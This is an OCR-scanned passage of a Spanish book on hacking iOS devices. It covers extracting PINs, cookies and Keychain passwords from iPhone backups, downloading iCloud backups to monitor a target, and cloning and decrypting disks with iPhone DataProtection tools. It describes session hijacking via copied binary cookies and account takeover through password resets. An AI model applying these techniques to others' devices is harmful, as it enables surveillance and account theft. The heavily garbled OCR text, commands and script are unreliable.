Whaisapp.  Tuentí  Movtl^  Llne  o  SpotBros.  En  la  siguiente  imagen  se  puede  ver  ct>mE>  se  recuperan 
conversaciones  borradas  de  Whatsapp. 


04.13:  Captura  de  conversaciones  de  Whatsapp  ncaJizaaas  Kecover Me^sages. 
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Análisis  de  ficheros  Flist 

Los  archivos  Property  Hst  {Flist)  orgctnizaii  datos  de  fomia  estructurada,  Generabneiite  son  utilizados 
como  fidieios  de  configuración  y  se  distribuyen  con  dos  AiniialoH  distintos:  en  XMT.  y  en  binarios. 

Indistintamente  del  formato  de  su  contenido,  es  aconsejable  usar  una  herramienta  que  ayude  a 
trabajar  con  ellos,  ya  que  en  ocasiones  pueden  ser  de  gran  tamaño  y  complejos  de  tratar.  Por  otra 
'pane.  estas  utilidades  también  facilitarán  la  conversión  a  XML  de  aquellos  PIlsí  que  sean  binarios 
mostrándolos  de  la  misiTia  fonna  que  si  fuesen  XML.  Fn  e^so  de  querer  convertir  un  ñeñero  binario 
il  formato  XML  se  debe  usar  la  herramienta  plutU  con  los  siguientes  parámetros: 

-cenvert  xmll  -o  -  <norabrí^  da  fichero>  ^ 

^iLst  Editor  es  una  aplicación  gratuita  {de  uso  no  comercial)  para  Miewsoft  Windows  que  soporta 
ambos  formatos,  permite  hacer  búsquedas,  minimizar  grupos  de  etiquetas  y  repisar  la  sintaxis  antes 
ik  guardar  un  archivo  modificado. 


Imagen  Q4.14:  Aplicación  Ediícr. 

Dentro  de  iir  archivo  Píí^t  se  pueden  encontrar  códigos  PIN  de  seguridad,  nombres  de  usuario, 
correos  electrónicos,  permisos  e  incluso  contraseñas,  por  lo  que  la  revisión  debe  ser  exhaustiva  y 
meticulosa,  en  especial,  en  aquellas  aplicaciones  más  relevantes. 

Un  ejemplo  de  esto  se  encuentra  en  el  PfN  que  un  usuario  puede  establecer  para  acceder  desde  su 
lerminaJ  iPhona  a  Dropbox,  Este  código  PIN  se  encuentra  dentro  un  fichero  Píht  llamado  com. 
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g^idrvphox.Dmpbox.Flht  aloiacenado  en  la  carpeta  de  la  aplicación.  Basta  con  acceder  a  él  con  nn 
editor  de  ficheros  Plisi  y  (obtenerlo. 


-í/±at-a> 

^k5yi>üropbosl)rtrrif f ípr-/ll-líí/í.ut.of«rr.ur£.  Tóanos  Tralla, 

a.  > 

(fe  «y í  n  i-nph  n  rD  Qc  □  C  f  £  &T:  -  /  S  a  3fT  aulc  /b  .  r  ar  <  y}i  c v> 

'(rr»Hi5-n  ci'í/reai?- 

<k  =y >D  ropb  ú  sD  O  c  0  ¿  f 3  ct  “  iPlaanfi  iat  r  o .  pd  ey^ 

■■jgiQiif  ic  ?r  ir  ^£ii> 

<ii  ay  =-D  tasb  o  s  P  as  3  C  odc’^  /t  ay  > 

E  1k.^>  gg  /s  t  r  ijig> _ 

■íli  ry  >rf  rrtpb  c>ti  PaEsreo^e^^^ns^Sz:  as  aE>  aJt  a.<  /k  e 
■íf  ftT  KF  /> 

■cfeey^EifapbúEltasscoderieííuiirc  Iboig  di  oJt  c  iyOrii  c  t  i  ve  </}s  e  y> 

<truÉ/s- 

<3i  Qy  >E-  r  cpb  qh  íbot.  oT^P  1  o  sásT  dí  de  r  *í  /k  ey  > 
ir,s>  /’í  /str  icig-í^ 
ey  >■?  11  aC  ache  3  i  z  idKu  y  ''/küy 
<int  egar  >1 04  S  S  7€  0  0  -í/  iiSít-  aerar  5- 


g  -  14-'^  i  MJM 


,  zm  Pü5f^b 


QDFTi.geídñQptrQíi.Dí'Gpbas'.ptjgt*"  pJiííiEüiijLir  Ijí  WtiJuwo 


^  -n  >L 


S'VWooPotg 


I  ay  >Eí  r  opbo  icE  itcijs  a^-ir^ate'í/key  > 


Imagen  Ü4.15:  PIN  de  ia  aplicación  Dmpbox  almaecnaóo  en  un  iichero  plist  del  backvp. 


Análisis  de  binary  cookies 

j\l  Igual  que  en  los  sistemas  operativos  de  escritorio,  en  los  terminales  iOS  se  guardan  eookip.s  de 
sesión.  Unto  la  de  los  navegadores  como  Apple  Safari  o  Googíe  Chrome^  como  la  do  las  aplicaciones 
que  funcionan  usando  servicios  web,  como  son  la  innicnsa  itiayoría,  por  ejemplo:  FacebooF 
Dropbox^  Googie  Maps,  etcétera. 

A  diferencia  de  los  navegadores  web,  las  cookies  de  sesión  de  aplicaciones  que  utilizan  wehserxdces 
son  guardadas  en  archivos  binarios  y  no  se  pueden  leer  Irarispareiitemeiite.  Estos  ficheros  tienen 
la  extensión  'Finar}KOoklcs’\  y  están  compuestos  por  páginas,  que  a  su  ve/  kc  R>rman  niediaoLe 
registros  con  los  datos  de  cada  cookie. 

Como  no  existe  doeuTnenlación  scjbre  cómo  se  genera  un  registro,  se  han  obtenido  los  campos  más 
relevantes  mediante  itigeniería  inversa,  que  son  los  siguientes: 
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ss 


Dalo 

Tamuno 

Taiiianü  de  la  coükie 

4 

Desconocido 

4 

Atribuios; 

0x1  secure 

4 

0x4  httpoiily 

Che  5  secuie+httpüiily  1 

Descoíiocido 

4 

Dircccíonamiento  de  la  URL 

4 

Direccionaiiiiemo  del  Nombre 

4 

Uireccionamiento  de  la  Ruta 

4 

Direccionamiento  del  Valor 

4 

Final  de  la  cookie 

1  8 

Fecha  de  expirdLión 

8 

Fecha  de  creación 

8 

URL  (temiína  con  nuil) 

N 

Nombre  (termina  con  nuil} 

N 

Ruta  (temiina  con  nuil) 

Valor  (termina  con  nuil) 

N 

Los  ficheros  de  tipo  binafycookie  se  pueden  convenir  e  impriiinr  a  texto  plano  con  el  ^cript  en 
Python  BinaryCookleReaderyát^üí:w[[3íáo  por  Satbhbl^En.  ocasiones,  estas  sesiones  son  válidas  y 
se  pueden  uLilixar  con  un  navegador  web  de  un  escritorio.  Fn  otras,  la  aplicación  utilizará  nn  servicio 
web  dei  que  hay  que  cotiocer  las  peticiones,  por  Jo  que  lo  más  sencillo  es  copiar  las  bmaFycookies 
directajnente  a  la  misma  aplicación  de  otro  iPhane  y  utilizarlo. 


rniit^bT:  -#  [lytlinn  íi-:infiryrn'i4i1crírB.Hrr  py  rnnkí  p<í  .hinrtrYfnokíes  " 

4  4  ^  4  4  4 ife*  4.4^  4^4  >4  4  4  4  >«4  ^4  4 

#  HinaryCDokitfteader:  by  sstishbS:  httpi/^'Ww.^ecLjrltyleam.rreit  # 

jy +  •'+■  + 4  ‘r“  +  *P‘r‘t*4  ‘K¥T'4  f  ‘¡■'f 4f4  44lí4i4fcí»-44'^rw4*f‘+‘t*+‘f4H'('444''('4‘*4’44wfJ'iHHíi#i444'4w  +  ‘44^‘4  #-44^ 

COOkie  J  _ut fltó=140477 36 B.  1§ 7 1  &4S3 32. 13457 alias.  135272^013. 13S1 0^622.1»;  íjQ> 
nflin-.pí rrirttcr.es ¿  pgth=/¡  e3(pLrc5=f ri,  2S  Mci'l'  2014; 

tookie  í  _  uiii*»*j40477aeo,4.ie,L3540®y0íZ:  tiomalní-.jier/inrar.es;  i>^rtv=/;  ^xp 
ire5-=Wejíl,  ÍB  Mov  2B12; 

cookie  :  _uiink-i 354033846 394, AjtfJrcW9ia>fW'tMírDíhOí:calílG7pbníkTZ3Jlib/^—.».0.B 
,,1,2721.0.2.1354050343715;  damain-^. pcrrinter.cs;  j53th=^/;  expires-Tbu^  28  H 
0^  2013; 

Cünkltf  :  üt]nl=139.  W.1rél792bWv#E:bMI}rtnv92BNlA2H5eB»f=. .  S.29. 9 . 0.  B  .É _ 1.1.G; 

clDinalf7==.pemnter.és;  paTii=/;  Exptres=Thij^  2a  Núv  2513: 

CDWkie  ;  _utniz=l 48477363. 1354&B8Í22,  ie,l,lrtiiKsr=ídirect|  |utTCcn=ídircc ti  |iJt  ! 
racT(í=ííí(inej ;  [tomaln-,  parrlitar.as;  path="/:  ejcelrés-prl,  zs  eec  2312:  - 

qookíe  :  CZk=il64iI4ZDAiqHTÍP13457B31B5BTE  ;  ífeJlBÍrt=.  perríntcr  -  ES ;  pBth=/ ;  ex  i 
piressMon,  17  Aug  2537; 

Cooklc  r  cccEchc^iJ;  danfllr^frrOwll. pe rr Inter  efi;  pipirJi-/;  expircsw^im,  27  7^ 

037:  I 

ront^gbtí-#  >; 


l:r.agcn  U4, 15:  Conversión  de  cookies  í:oiiBüiar-.-yaok!eIieadeí:py. 
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Con  la  cxlensiÓT]  Coaktfds  Mnncigí'r—^Mñ  el  íiavegadoi’  Fírefox  es  jmy  sencillo  modificar  y  añadir 
nuevas  entradas  a  partir  de  ios  datos  obtenidos  de  una  bman^cookte.  F1  objetivo  de  este  análisis  es 
Ilegal-  a  acceder  a  sitios  restringidos  en  los  que  la  sesión  sea  válida,  como  podrían  llegar  a  ser  el 
correo  electrónico,  redes  soeiales,  alniaceijaniiento  en  la  nube,  niensajeiia  instantánea,  etcétera. 

Es  especialmente  interesante  el  correo  personal,  ya  que  una  vez  que  se  accctla  a  el,  el  resto  de 
usuanos  y  contraseñas  se  obtendrán  utilizando  los  procesos  de  ''reinício  de  contraseña’'. 


Imíigen  04J7:  lidición  dtí  evokies  cqd  cxlei'iiiÓTi  Cookií^^i  MctmigeF—. 

Para  que  la  supiautación  sea  eficaz,  se  ha  de  considerar  que  estas  sesiones  son  válidas  para  los  sitios 
especialmente  diseñados  para  móviles.  Lo  que  quiere  decir  que,  por  ejemplo,  es  posible  que  una 
cookie  sea  coniecta  para  la  web  ^"m.Facebookconf\  pero  no  para  /  bn  estos 

casos,  se  debeiú  niodificar  también  el  Ust^r-Ágenl  del  navegador,  par  a  que  redil ecc  tone  al  sitio  web 
correcto, 

Casos  famosos  de  bínarycookies  que  se  encuentran  en  un  terminal  y  que  pueden  ser  utilizadas  en 
otros  termínales  sin  problemas  son  los  áeLmkedin  para  iOS  o  Dropbox,  permitiendo  que  si  se  tienen 
esos  ficheros  dcl  backup^  baste  con  copiarltjs  y  acceder  a  la  cuenta  dcl  dueño  dcl  hackup. 
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i  i  el  PaEJRTVEm:? 
i  libra  ry 


I  \  j,  CKh« 


I  f  i^-^coofcÍK 


ImiLgcii  Ü4.1  y;  BüioiyCookies  de 


Análisis  dcl  Kevehain 

V 

El  Kcychain  es  un  Uchcro  contenedor  seguro,  cifrado  con  un  algori  Lino  A  HS  f  2  Sbits,  que  que  es  usado 
en  lOS  por  mil Iti pies  aplicaciones  para  guardar  cüriLrascñaR,  cerrificados  digitales^  claves  privadas, 
eícetera .j^)e  esta  tbrma,  cada  aplicación  del  sistema^  tan  solo  accede  a  sus  propias  contraseñas 
usando  los  métodos  secJtEmAdd..  secIterjiDelete^  scchemCopyMaíchin^  y  secftemUpdate^  evitando 
que  las  aplicaciones  almacenen  la  intorniacióii  de  fomias  menos  seguras  (conio  en  un  ñclieio  Pllsi). 

Otra  característica  del  Keychaln  es  el  uso  de  clases  segnn  el  dato  que  se  quiera  almacenan  Existen 
cinco  distintas:  kSecClas.^'GenericPasswordp^^  contraseñas  gcncrícas,  kSecCIassíníemetPassword 
para  contraseñas  de  Internet,  kSecChi^sCi^rüfícate  para  certificados,  kSecCía^sKey  para  llaves  y 
kSe.cClasskkntify  para  identidades  digitales  (certificados  con  claves). 

Para  entrar  la  íiiíbrniación  dcl  Keychain  se  utiliza  una  clave  única  pt)r  dispositivo,  esta  clave  íkey 
Gx835)  no  se  puede  exportar  de  tal  forma  que  el  contenedor  no  puede  ser  leído  en  otro  terniínaí.  El 
archivo  de  Keychaln  es  una  base  de  dnLos  SQLUe  que  se  encuentra  situada  dentro  dcl  terminal  en  ia 
ruta:  /prívate/vaiiKeychaim/KeyrMin-2M  y  es  guardado  en  el  PC  ct>n  Apple  íTunes  cada  vez  que 
se  realiza  una  copia  de  seguridad.  De  esta  copia  almacenada  en  el  directorio  de  backiíp  no  es  posible 
obtener  todos  los  datos,  yaque  tal  y  como  se  ha  explicado  anteiionnente,  es  necesaria  una  clave  que 
esta  únicamente  en  el  dispositivo,  pero  sí  es  posible  exportar  basümLc  intbrmación. 

Usando  la  herramicntn  ''keychan_tooí.py-\^  ^  incluida  en  los  scríptg  de  iPhojie-datapmtecüón,  && 
puede  generar  im  fichero  CSY  de  conlrascnas  usando  el  parámetro  y  especificandü  el  archivo  de^í 
^Keychain  Y  el  MojnfesLPlist 


root@bt!-'/iphone’‘CÍataprotectia£i/pytfiü(i_ficripts#  pyLhqn  keychain  toDt,py  -p  i 
/raat/bHckup2/kcychain-backup,pllst  /rcnt/backiip^/Wanlfest .pLisI 
if  you  have  keyass  ftji  cIcvIce  2eS0ecc0BBabe93dddcbjí7ccBBBBbe932ñadf€?cl í  ente 
r  it  tln  hex) 


Writing  passwDrTl^  ta  keychaín.csv 

rí>ot@bt :^/iphone-d2taprotection/pythGn_scripts#  | 


Iniíigwi  04. 19:  VolL^iido  de  Kevehain  con  keyehaiu  íooL 
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Dependiendo  dei  numero  de  aplicaciones  que  utilicen  el  Keychain  en  un  terminal  o  del  uso  que  el 
dueño  del  dispositivo  le  haya  dado,  podí  ais  aparecer  coiitinserlas  de  redes  W¿-Fí^  el  PIN  de  la  SIM, 
las  claves  de  los  correos  electrónicos,  las  contrasenas  de  acceso  a  las  VTN^  etcétera. 

Para  realizar  este  volcado  de  contraseñas  existen  más  herramientas.  La  utilidad  de  Eicomsoft  Fhone 
Fmsword  ^rea/rer,  Jtambién  üicluye  un  módulo  especial  para  revisar  el  contenido  del  Keychain 
de  uíi  sisleina  de  una  forma  mucho  máx  visual  y  sencilla.  F.n  el  siguiente  ejemplo  se  muestran  las 
credenciales  de  una  cuenta  de  correo  que  han  sido  extraídas  del  Key^cha'm  de  un  backup  con  la 
utilidad  citada. 


Imagen  04, 2Ü;  Volcado  ú^Ke-ychain  QOiiEtcomSofí  Phone  Pass\^m'd  Breaker. 


7,  El  backup  en  Apple  iCloud 

Con  el  nuevo  sendeio  de  Apple  iCloud  para  los  usuarios  de  cualquier  dispositivo  iOS  es  posible 
almacenar  las  copias  de  seguridad  del  lerinhial  completo  en  la  nube  átApple^  udeuiás  de  sinertmizar 
rUrtís  dalos  corno  la  agenda  de  contactos,  las  citas  del  calendario,  las  notas  o  las  fotografías. 

Para  poder  acceder  a  esta  información  almacenada  en  el  backup  de  Apple  iCloud  es  necesaria 
conocer  el  nombre  de  usuario  y  la  contraseña  de  la  cuenta  Apple  del  dueño  del  terminaL  Estas 
eredeneiales  no  se  encuentran  directamente  en  el  Keychain  de  un  hackup  de  Apple  iTimes^  por  lo 
que  será  necesario  probar  suerte  con  las  usuarios  y  credenciales  de  aquellas  cuentas  que  se  hayan 
averiguado  de  ott  os  servicios  o  utihzar  un  ataque  directamente  al  terminal,  haciendo  unJaílbreak  al 
dispositivo  físico  o  iniToducicndo  un  malwai'e  dentro  dcl  sistema. 

En  cualquier  caso,  una  vez  se  tenga  acceso  a  las  credenciales  de  Apple  iCloud,  con  otra  de  las 
caiacteristicas  de  la  utilidad  de  Eicomsoft  se  podrán  descargai  copias  de  seguí ídad  completas  de 
otras  fechas  del  di.sposilivo.  Tan  solo  inLroducíéiido  los  parámetros  de  auterilicaciófi,  seleccionando 
la  copia  a  volcar  y  el  directorio  de  destino. 


Capitídlo  IV  Atacando  el  backup 


m 


Imagan  04.21  f^eleccíón  de  copias  de  seguridad. 


1:1  contenido  de  Apple  iCloud^  almacena  direetamcntc  sin  ciTrar,  por  lü  que  el  análisis  consistirá  eii 
llevar  a  cabo  las  mismas  tareas  que  una  copia  de  Apple  iTunes  en  la  que  no  se  estableció  contraseña. 

Esto  perniitLría  vigilar  constantemente  al  objetivo,  ya  que  cada  vez  que  se  generase  una  nueva  copia 
de  seguriilad  esta  pcKlna  ser  descargada  directamente  a  nuestra  máquina  y  analizarla. 
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Capítulo  V 

iPhone  DataProtection 


1.  Introducción 

Para  habilitar  la  protección  de  datos  en  im  dispositivo  íPhone  es  iiecesaiio  configunir  \ma  palabra 
de  paso  o  p¿7sscode^  la  cual  es  por  defecto  un  código  de  tipo  PIN,  aunque  como  se  ha  visto  puede 
ser  mucho  más  ctimpleja.  Para  configurarlo  tan  solo  hay  que  habilitar  esta  característica,  la  cual  por 
defecto  ^iene  en  el  apartado  *‘GeíierifP  dcl  dispositivo,  tal  y  como  se  puede  apreciar  en  la  imagen 
siguiente: 


ímtigci»  Ü5.Ü1 :  Opciones  de  contraseña. 


A  partir  de  íOS  4  se  cifra  cada  fichero  creado  con  una  clave  alearoria.  Dicha  clave  se  alinacena  a 
bsjo  nivel,  y  pemiite  que  desde  el  propio  dispositivo,  se  pueda  acceder  al  dalo  descifrado  al  vuelo. 
Esm  caractei’istica  da  soporte  a  fimeiones  de  bonado  seguro  de  la  información  del  teléfono  y  a  la 
pní lección  a  alto  nivel  contra  ataques  de  fuerza  hniLa  de  contraseña. 
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\TedianLt:  proLcdimicTiLos  forenses  se  obtiene  una  imagen  bí!  a  bit  del  disco  de  un  dispositivo 
IOS  usando  herramientas  especíñeas.  PrácLiearnenLe  Lodos  los  datos  residentes  en  el  dispositivo 
se  encoiiíraráii  cifrados,  haciendo  inútiles  todo  tipo  de  récnicas  relativas  a  la  rcoupcracióii  de  la 
información  cu  tiempo  útil.  Sin  embargo^  al  existir  fallos  en  el  BootROM  explotables  en  el  proceso 
de  arranque,  es  posible  conseguir  que  sea  el  propio  iOS  el  que  desciñe  el  disco  y  mediante  las 
lien  amientas  de  iPhorie  DataPrníectioft  acceder  al  sistema. 

iPhnne  DataPwtectwn  está  conipuesto  por  un  conjunto  de  scripts  diseñados  para  el  ámbito  forense 
en  dispositivos  /OlJ.* Son  friití)  de  una  investigación  llevada  a  cabo  por  la  empresa  Sogeti,  y  de  ellas 
se  proporciona  el  código  fuente  libre  y  sin  coste  alguno. 

Este  conjunto  de  Scripts  implementan  las  funciones  criptográficas  necesarias  para  manipular  el; 
eifiado  de  los  archivos  y  del  disco  de!  dispositivo,  y  así  poder  oífecer  soporte  para  múltiples  vías  dé 
ataque,  las  cuales  se  enumeran  a  continua ción: 

-  Hcrramicnlas  para  décodificai’  un  bcjckup:  / 

-  lierramientas  para  realizar  ataques  basados  en  hardware  a  contraseñas,  ^ 

Scri0s  de  mapeo  de  puertos. 

-  H  eiraÉiienlas  pata  recuperar  ficheros  el  i  mi  nado  5 . 

-  HcTTani lentas  para  realizar  copias  de  disco  duro. 

-  l  leiramientas  para  descifrar  unidades  de  disco. 


2.  [VI  untando  iPhone  DataProtection 

Jfí  proceso  de  instalación  de  las  herramicnlas  DaiaProIecBon  es  bastante  sencillo  de  realizar.  Pai'a 
ello,  solo  se  hace  necesario  la  instalación  de  las  siguientes  dependencias: 

P^Crypicj. 

-  A^2Cfypt<i. 

PmgresífBaK 

ComK¿T%tct 


Imaesn  05.02:  Instalación  ác  dcpcrdcnciaa. 
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dina  ve/  que  se  Lengan  las  dependencias,  las  herrainientas  de  iPhone  DataProíecüoti  podrán 
cutarse  sin  problemas. 


s  íIm erlmch :  Sp vt  han  ]tiac]íup_t  □  d  1 .  p v 

ÜGagtí:  litii; n  ri  T  ..  <lMic¡cup  patli>  [oiitput  p^thl 
silwerliíiclí 


Imagéii  Q5..03  :  Ej«i3üi:iija  dtí  DistciProt:ecTi&i7:‘  ' 


3.  Clonando  un  iPhone  bit  a  bit  con  iPhone 
DataProtection 

É&  herrani lentas  de  Datarmfecñofi  incorporan  un  sencillo  script  que  permite  que  se  pueda  clonar 
ftír  a  bit  una  partición  de  vin  dispositivo  iOS. 

HL/bin/s.i 

5Sl(0PTS-"-[i  2222  -líSti  ii.  Líiua  L'ttyCh Kcking-no  -QU5erKnovfn}ta5tsFile-/<Jevynuil'' 

J«'lJ-‘5sh  rcKrtíElíicaihost  /'ii;isi.jjLe_lHrui  uJitS'" 

If  [  "SlJDID"  —  ]3  rhpn 

«i-t 
fi 

echo  "Dci/ice  IJDE?  í  SfÜDlÜ' 

-p  íiaiTD 

DATlE='d3tc  ■^’’^‘¥1WC■d  9MI21*’ 

[■ll:4ll3,l,ü/dBtB  ^TE.dn^ 

echo  “DimplJig  esta  aar+iHíin  -ín  fiMii  _ " 

ÍS^HQPTS  root^locslhosl:  “dd  lf«ydüv/rdííitífts23l  h^fUííJ  |  \  dd  i  f =/íftif/lfdÍ5ke  s  ls2  !í5iBaS2"  >  JOUT 

Imagea  G5.Ü3;  Üctíití  utilízailc}  para  la.  plonaeióii  de  pitrlieieineyi  . 


Este  ycrlpí.  lee  el  contenido  del  sistema  de  ficheros  dei  dispositivo,  y  copia  bit  a  bií  todo  el  contenido 
a  una  imagen  de  tipo  OMü.  Una  vez  tenninada  la  copia  binaría,  esta  puede  abrirse  con  la  aplicación 
^FSExpIorery  Úxj^m  Forí^n,^  o  el  propio  sistema  de  ficheros  de  OS  X, 


Imagen  05. .04:  HFSExpIoj-er  leyendo  imaperi  DMG: 
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Debido  a  que  la  aplicación  HFSExplorer  no  puede  descifrar  por  sí  misma  el  contenido  de  la  imagen 
generada  por  las  aplicaciones  de  DaiaPmteciion  (liay  que  recordar  que  los  datos  se  encuentran 
cifrados),  los  desarroJladores  de  este  conjunto  de  herraniientas  han  puesto  a  disposición  del  público 
una  versión  modificada  de  HFSExplorer,  que  permite  cargar  en  la  aplicación  la  imagen  cifrada  iuntn  ' 
al  fichero  de  claves  PLiST. 


Imagen  05,05:  HFSExphm  el  üchsm  He  claves 


4.  Accediendo  con  HFS 

La  única  intbmiación  que  se  encuentra  parcialmente  visible  son  los  metadatos  del  sistema  de  ficheros. 
Pelo  toda  la  iiifoimación  relativa  a  un  archivo  u  objeto  del  dispositivo,  se  encontrará  cifrada  en  su 
interior.  Una  herramienta  sencilla,  intuitiva  y  de  licencia  GNU,  es  la  herramienta  HFS  Explorer. 
Se  puede  descargar  gratuitamente,  y  servirá  para  ilustrar  un  poco  más  esta  característica  de  los 
dispositivos  propiedad  de  Apple.  En  la  siguiente  captura,  el  lector  podrá  comprobar  cómo  se  puede 
ver  con  claridad  los  metadatos  del  sistema  de  ficheros  de  un  jPhone  4.  Estos  metadatos,  son  útiles 
para  poder  desenvolverse  con  soltura  por  el  sistema  de  ficheros,  e  identificar  con  claridad  todos  y 
cada  uno  de  ellos. 


Imagen  (15.06:  Metadatos  en  sistema  de  ficheros  HFS, 


Cúpítulo  K  íFhone  DaíaPrntection 
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Si  se  desea  exiraer  algún  dsXo,  HFS Ejiphrar  ofrece  ima  opción  interesante  y  Mcil.  A  través  del  botón 
dereciio  del  ratón,  es  posible  extraer  los  datos  directamente  a  un  PC. 
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Imagen  Ü5.07:  ExLraLíci6n  ds  datos  en  aííítema  de  flcheíos  HFS. 


Uiia  VC7  extraído  el  dato,  si  se  edita  el  niisTm)  eor  ^Igiin  editor  hexadecimal,  se  pí>drá  comprobar 
que  el  dato  se  encuentra  ilegible,  y  por  tamo,  inurjl  desde  un  punto  de  vista  malicioso  o  de  forense 
por  ejemplo. 
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Imagct]  05.08:  Datoíí  extraídos  y  cjfraduü  yisLcma  dsticheros  IIFS. 
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Hackirig  de  dispositivos  iOS:  iPhom  &  iPad 


5.  Sacando  claves  con  iPhone  DataProtection 

Acnialmentc,  los  disposiLívos  /O^S' vienen  con  la  funcionalidad  de  cifradn-dcsdfradü  por  haidwaie, 
lo  que  le  confiere  un  procesador  dedicado  exclusivamenie  a  esta  tarea,  Gracias  a  ello,  se  reduce 
notablemente  el  impacto  de  cítrado-d  es  cifrado  en  el  sistema  operativo  embebido. 

En  este  procesador  se  encuentran  embebidas  dos  claves.  Una  de  las  claves,  es  uriílclave  UID,  la  cual 
referenciará  a  im  usuario.  Debido  a  que  estos  dispositivos  son  m  o  non  su  ario,  esta  clave  AES  será 
diferente  para  cada  dispositivo.  La  otra  clave  almacenada  en  el  procesador,  es  una  clave  hardware, 
y  IJaTTiada  ^^ID,  la  cual  identifica  una  única  clave  por  modelo  de  dispositivo. 

El  proceso  de  cifrado  consiste  en  cifrar  cada  fichero  con  una  única  clave.  Esta  clave,  será  una  clave 
derivada  de  las  claves  almacenadas  en  el  procesador  dedicado  (UID  más  GID),  más  la  clave  que 
genere  el  proceso  o  aplicación  que  necesite  generar  y/o  modificar  un  fichero  dentro  del  espacio  del 
usuario.  Estas  llamadas,  a  su  vez,  se  ahiiacenan  en  un  contenedor,  el  cual  es  llamado  keyhag.  Este 
contenedor,  (basado  en  sofo^^a^e).  a  su  vez,  se  encuentra  protegido  gracias  a  la  palabra  de  paso  o 
PIN,  que  se  utiliza  normalmente  para  desbloquear  el  dispositivo. 

UsiialmeuLe  esta  palabra  de  paso,  suele  ser  un  PIN  de  4  dígitos.  Un  PIN  de  este  tipo,  es  una  contraseña 
f  ácilmente  adivinahle  por  técnicas  simples  basadas  en  tiempo,  en  ftierza  bruta,  en  probabilidad  y  en 
eiiUopía. 

A  Través  de  la  probabilidad,  y  conociendo  todos  los  estados  posibles  de  un  PTN,  se  puede  medir  la 
Itecuencia  con  la  que  se  obtiene  un  resultado  específico  y  útil.  La  entropía,  a  su  vez,  pennite  que  se 
pueda  medir  la  incertidumbre  de  una  fuente  de  información. 

Para  poder  medir  la  fortaleza  de  una  contraseña  basada  en  un  PTN  de  4  dígitos  en  un  supuesto  ataque 
por  ftierza  bruta,  se  pueden  realizar  cálculos  computando  la  entropía  de  la  información  basándose  en 
dos  variables  clave.  Una  de  ellas  será  el  número  de  posibles  símbolos  a  escoger  en  utia  contraseña^ 
y  la  otra  variable  será  el  número  de  símbolos  en  la  contraseña.  Para  ello,  se  puede  utilizar  la  fórmula 
siguiente: 


iI=Llog,Ar=L^ 

¡ma^en  05.09:  Fórmu  a  para  medir  h  furtaiezu  de  una  oortraseña. 

Al  aplicar  a  la  fórmula  basándose  solo  cii  una  clave  basada  en  PIN,  el  número  de  posibles  símbolos 
(símbolos  del  0  al  9),  unido  al  número  de  símbolos  en  una  contraseña  de  tipo  PIN  (4),  se  obtiene  una 
entropía  de  13,28.  En  pocas  palabras,  se  necesitarían  únicamente  y  como  máximo  10.000  intentos 
(10^^  posibilidades)  para  poder  averiguar  la  clave  que  daría  acceso  a)  keybag. 

Para  dar  mayor  protección,  los  dispositivos  iOS^  llevan  una  protección  por  software,  la  cual  impide 
que  puedan  realizar  ataques  basados  en  fuerza  bruta.  Esta  prctccuión  limita  a  10  intentos  el  que 
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t  pueda  introducir  una  clave  errónea.  Si  se  sobrepasa  esta  barrera,  el  dispositivo  borrará  las  claves 
^‘mas  necesarias  para  el  citrado/descifrado,  y  la  infornaación  será  inecuperablé. 

Debido  a  que  Ja  característica  de  DaíaProfecnon  se  diseñó  para  proteger  los  datos  fente  a  ataques 
de  tipo  qffilne  (ataques  en  donde  se  tienen  los  datos  pero  nu  el  dispositivo  físico),  existen  numerosas 
lÉcoicas  y  hcTramienras  que  se  basan  en  ellas  que  iraLan  de  dar  solución  a  esta  problemática. 


Preparando  el  entorno 

^Cuando  un  dispositivas  iPhone  se  inicia,  lo  hace  siguiendo  una  cadena  de  confianza,  verificando 
ediaiiLc  un  ha^h  cada  fichero  que  carga  durante  el  arranque. 


i  primera  fase  de  arranque,  se  realiza  a  Ira  ves  dcl  RoofliQM^  y  se  completa  cargan  dts  todos  los 
"tificados  raíz  que  se  utilizar  án  para  validar  la  finna  de  cada  paquete  que  se  instale  en  las  siguientes 
es  de  aritiiique. 

Jsa  vez  que  arranca  el  BootliOM,  este  iniciará  un  caigador  de  an^anque  a  bajo  nivel  {Low  J^evel 
Al  iniciaiizarse  este  (una  vez  vcriricada  su  firma  a  través  de  los  certificados  raíz),  se  pasará  a  la 
jíenre  fase  de  arranque-  la  cual  se  miciará  con  el  íBoot.  Uno  de  los  cometidos  de  este  cargador,  es 
ilicar  las  firmas  dcl  KerneU  así  como  las  difereiilcs  aplicaciones  de  usuario.  Si  estas  son  correctas, 

[  sisLcrna  iniciará  de  manera  correcta,  y  el  dispositivo  se  encontrará  en  una  fase  de  utilización  por 
^  de  un  usuario  final. 


poder  saltar  la  restricción  de  veriiicacióu  del  cargador  de  arranque  iBoot  más  el  sisLcma 
rativo,  los  disposiiívos  basados  en  iPhonp.  disponen  de  un  modo  especifico  para  estas  tareas,  fis 
rnodo  Ui'  LJ  o  iiiodo  de  actualización  de  BiTjfiworc  {I^cvicG  Fir^iwíirt  Up^rodé). 

e  modo  es  utilizado  principalmente  para  la  actualización  (o  desacuializacióii)  del  sistema 
nativo  instalado.  T,a  comprobación  de  integridad  de  ficheros  se  correspondería,  una  vez  iniciado 
dispositivo,  con  la  siguiente  imagen: 


iBoofflOM 


— " 

m 

.É 

1  1^ 

Imagen  05.1 1 :  Jüicio  de  dispositivo  eri  modo  DFIJ  FtrrmUTí^é'  Upgrade).  > 
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Antes  de  arrancar  el  dispositivo,  es  neensario  generar  una  imagen  de  arranque  con  ks  hcrraTiiienlas 
Dccosarias  paia  poder  realizar  el  ataque  con  éxito.  Paradlo,  las  heiramieiitas  de  DaiaProtectíon, 
incorporan  un  script  llamado  litnieí _pal€heKp}\  que  está  diseñado  para  realizar  esta  tuiicióii.  Este 
scrlpt  necesita  el  ñchero  de  claves  liLiI izado  por  la  aplicación  RedS^iOw  para  descifrar  la  Ramdisk 
y  c1  kernd,  así  como  una  imagen  válida  de  nn  dispositivo  iPhtme.  El  fichero  de  claves  que  utiliza 
RedSíiíhv  se  encuentra  en  k  propia  aplicación,  y  la  extracción  es  muy  simple  de  realizar; 


imagen  D5.12;  EXirayerMlo  Ocherv  de  L:lavií  &  Keys.píi^t 


Los  ficheros de  IOS  se  pueden  descargar  gratuitamente  del  sirio  Web  http:/AvwwgeiíOS, 
co;7n^Una  vez  genei-ado  el  parche  para  la  imagen  dcseaigada  y  constiniido  una  imagen  de  disco 
RAM,  es  posible  arrancar  el  dispositivo  iPhone  a  través  de  la  heiraTnicnía  RedSnOw. 


